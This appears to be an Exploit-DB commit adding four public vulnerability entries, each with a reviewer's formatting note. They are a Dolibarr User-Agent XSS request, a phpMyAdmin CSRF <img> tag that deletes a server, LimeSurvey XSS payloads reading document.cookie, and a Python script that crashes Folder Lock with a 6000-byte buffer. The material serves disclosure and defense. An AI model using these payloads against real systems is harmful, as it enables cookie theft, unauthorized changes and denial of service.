DB: 2019-09-14
4 changes to exploits/shellcodes
Folder Lock 7.7.9 - Denial of Service
Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
LimeSurvey 3.17.13 - Cross-Site Scripting
parent: c0ce31079a
commit: d154146052
5 changed files with 277 additions and 0 deletions
20
exploits/php/webapps/47384.txt
Normal file
@ -0,0 +1,20 @@
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================

Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.

GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>
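Review bot: the proof of concept stops at the request (`GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1` through the `User-Agent:` line) and never shows the response, so the Description's claim that the header value is "copied into the HTML document as plain text between tags" cannot be checked from this file; add the excerpt of the response body around the injected `<script>alert("XSS")</script>` and state whether card.php needs an authenticated session, since the request as shown carries no Cookie header. The header block is also hard-wrapped: `# Exploit Title:` ends at "Cross" with "Site Scripting" on its own line, and `# Software Description :` is split the same way, so anything that reads these fields line by line gets a truncated title. Put each field on one line.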
79
exploits/php/webapps/47385.txt
Normal file
@ -0,0 +1,79 @@
=============================================
MGC ALERT 2019-003
- Original release date: June 13, 2019
- Last revised: September 13, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,3/10 (CVSS Base Score)
- CVE-ID: CVE-2019-12922
=============================================

I. VULNERABILITY
-------------------------
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery

II. BACKGROUND
-------------------------
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.

III. DESCRIPTION
-------------------------
Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
server in the Setup page.

IV. PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server

<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />

V. BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request that
wants to execute on behalf the user,in this way making possible a CSRF
attack due to the wrong use of HTTP method.

VI. SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1

VII. SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.

VIII. REFERENCES
-------------------------
https://www.phpmyadmin.net/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
June 13, 2019 1: Initial release
September 13, 2019 2: Last revision

XI. DISCLOSURE TIMELINE
-------------------------
June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
June 13, 2019 2: Send to vendor
July 16, 2019 3: New request to vendor without fix date
September 13, 2019 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
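Review bot: section V blames "the wrong use of HTTP method", but the actual defect is the missing token check that section VII describes; moving the remove action to POST would not stop CSRF (an auto-submitting form does exactly what the `<img>` does), so the impact text should name the absent token, not the method, as the cause. The preconditions are also unstated: the PoC only works if `setup/index.php` is reachable for the victim and whatever access that script requires is already satisfied in the victim's browser, and the advisory should say so. Finally, the `<img src="` attribute in section IV is broken across two lines, so the URL as written begins with a newline; keep `http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"` on the same line as the opening quote.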
146
exploits/php/webapps/47386.txt
Normal file
@ -0,0 +1,146 @@
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
=======================================================================
title: Stored and reflected XSS vulnerabilities
product: LimeSurvey
vulnerable version: <= 3.17.13
fixed version: =>3.17.14
CVE number: CVE-2019-16172, CVE-2019-16173
impact: medium
homepage: https://www.limesurvey.org/
found: 2019-08-23
by: Andreas Kolbeck (Office Munich)
David Haintz (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"LimeSurvey is the tool to use for your online surveys. Whether you are
conducting simple questionnaires with just a couple of questions or advanced
assessments with conditionals and quota management, LimeSurvey has got you
covered. LimeSurvey is 100% open source and will always be transparently developed.
We can help you reach your goals."

Source: https://www.limesurvey.org/


Business recommendation:
------------------------
LimeSurvey suffered from a vulnerability due to improper input
and output validation. By exploiting this vulnerability an attacker could:
1. Attack other users of the web application with JavaScript code,
browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.

The vendor provides a patch which should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a
short spot check has been performed and additional issues are to be expected.


Vulnerability overview/description:
-----------------------------------
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
which allows an attacker to execute JavaScript code with the permissions of the victim.
In this way it is possible to escalate privileges from a low-privileged account e.g.
to "SuperAdmin".


Proof of concept:
-----------------
1) Stored and reflected XSS vulnerabilities
Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new survey groups.
Then create a survey group with a JavaScript payload in the title, for example:

test<svg/onload=alert(document.cookie)>

When the survey group is being deleted, e.g. by an administrative user, the JavaScript
code will be executed as part of the "success" message.


Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept prints the current CSRF token cookie which contains the
CSRF token. The parameter "surveyid" is not filtered properly:

http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question


If the URL schema is configured differently the following payload works:
http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 3.17.9 and the latest
version 3.17.13. It is assumed that older versions are affected as well.


Vendor contact timeline:
------------------------
2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:
https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory


Solution:
---------
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release

The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Kolbeck / @2019
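Review bot: the header line `fixed version: =>3.17.14` disagrees with the Solution section's "Update to version 3.17.15 or higher", and the operator is written backwards (the same header uses `<=` for the vulnerable range, so this should be `>=`). The timeline says 3.17.14 "fixes the security issues" and 3.17.15 is a "bug fix", so the header value is the accurate one; make the Solution line say 3.17.14 or later, or explain why 3.17.15 is required. Both reflected-XSS URLs in the PoC are also wrapped across two lines (`...surveyid=xxx%22%3E%3Cimg%20` / `src=x%20onerror=...` and `...&surveyid=` / `xxx"><img%20src=x...`), which splits the payload; put each on one line so it can be copied as-is.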
28
exploits/windows/dos/47383.py
Executable file
@ -0,0 +1,28 @@
# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
# Date: 12.09.2019
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.7.9
# Tested on: Windows 7 x64


# 1.- Run python code :Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
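Review bot: the script does not run under Python 3 as written: `print "[+] Creating %s bytes evil payload.." %len(buffer)` and the other two `print` statements are Python 2 syntax while the interpreter line is the unversioned `#!/usr/bin/env python`; either use `print(...)` or name `python2`. That `#!` line also sits after the header comments instead of on line 1, so it is not acting as a shebang at all. The file names disagree: the code writes `Evil.txt`, steps 2 and 4 say `EVIL.txt`, and step 1 says to run `Folder_Lock.py` although the committed file is `47383.py`. The bare `except:` swallows the real error (catch `IOError as e` and print it), and as displayed here the bodies of `try:` and `except:` carry no indentation, which should be checked in the committed file. Lastly, the entry gives no crash detail at all (exception type, faulting address or register state) for the 6000-byte input to the 'Serial Number and Registration Key' field, so readers cannot judge whether this is more than the "Denial of Service" the title claims; add that output.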
@ -6559,6 +6559,7 @@ id,file,description,date,author,type,platform,port
47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows,
47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
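Review bot: the new row records 47383 with date `2019-09-13`, but the file it indexes says `# Date: 12.09.2019`; if the date column is meant to be the exploit's own date rather than the day it was added, it should read `2019-09-12`. The rest of the row matches its neighbours (empty port, `dos,windows`), and inserting it just before id 3 keeps it inside the dos/windows block that the context lines show ending there.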
@ -41728,3 +41729,6 @@ id,file,description,date,author,type,platform,port
47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80
47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java,
47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,
47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php,
47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80
47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80
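Review bot: the port column is inconsistent across the three new rows: 47385 and 47386 carry `80` while 47384 is left empty, although all three are `webapps,php` entries for HTTP-delivered XSS/CSRF; set 80 on 47384 or leave all three empty. The author for 47385 is also stored as "Manuel García Cárdenas" with accents while the advisory in 47385.txt spells it "Manuel Garcia Cardenas"; use one spelling so author searches match the file.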
Can't render this file because it is too large.